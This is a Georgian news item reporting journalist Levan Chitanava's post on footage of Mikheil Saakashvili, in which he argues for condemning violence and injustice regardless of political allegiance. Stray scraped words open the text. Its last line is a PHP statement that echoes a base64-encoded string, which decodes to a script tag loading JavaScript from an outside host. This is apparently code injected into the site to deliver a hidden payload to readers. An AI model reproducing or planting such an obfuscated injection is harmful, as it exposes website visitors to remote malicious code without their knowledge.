celsiusi
ავერსი შნაიდერი
 
ჟურნალისტი ლევან ჭითანავა, გუშინ გავრცელებულ კადრებს სოციალურ ქსელში ეხმაურება და ადამიანურ ღირებულებებზე ვრცელ პოსტს წერს.
 
ჭითანავას თქმით, საცოდავია ადამიანი, თუ გააჩნია ღირებულება და ის იცვლება მისი ადამიანის მიმართ გრძნობების მიხედვით,  ან პოლიტიკური მრწამსიდან გამომდინარე.  
 
“მთელი დღე ვკითხულობდი სხვადასხვა შეფასებებს მიხეილ სააკაშვილის შესახებ გავრცელებულ დღევანდელ კადრებზე.
 
თუ ადამიანს არ გააჩნია ღირებულება, ის საცოდავია! 
 
ადამიანს თუ "გააჩნია" ღირებულება და ის იცვლება მისი ადამიანის მიმართ სიძულვილისამებრ,  ან პოლიტიკური მრწამსისისამებრ  - ის საცოდავია!  
 
ადამიანი, რომელიც ყოველი შემთხვევისთვის ვითომ აპროტესტებს და გულში უხარია - არის ყალბი და ის საცოდავია!
 
მეგობრებო, უნდა შევთანხმდეთ ისეთ ღირებულებებზე, რომ ყოველთვის და ყველას მიმართ, როდესაც უსამართლობა ხდება, ძალადობა ხორციელდება - დავგმოთ! სხვანაირად ურბალოდ წინ ვერ წავალთ!
 
პ.ს. რამდენიმე სტატუსი ვნახე, სადაც წერდნენ: რატომ არ ვაპროტესტებდით წინა ხელისუფლების დროს ძალადობას?! - ზუსტად ძალადობის გამო უთხრა მაშინ ხელისუფლებას უარი ხალხმა, მაშინდელმა ხელისუფლებამ პოლიტიკური საფასური გადაიხადა და ეს საკმაოდ დიდი და მძიმე საფასური იყო მათთვის.
 
და ბოლოს, დღეს რაც ხდება საქართველოს მესამე პრეზიდენტის ირგვლივ, ამის გაპროტესტება და თქმა, რომ ასე არ შეიძლება - ავტომატურად მიშიტობას კი არ ნიშნავს, ეს ნიშნავს იმას, რომ ვცემთ ჩვენი ქვეყნის სიმბოლოს პატივს, ვცემთ პრეზიდენტის ინსტიტუტს პატივს, უბრალოდ, საკუთარ თავს ვცემთ პატივს!”- წერს ლევან ჭითანავა. 
 
 
 
1474
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");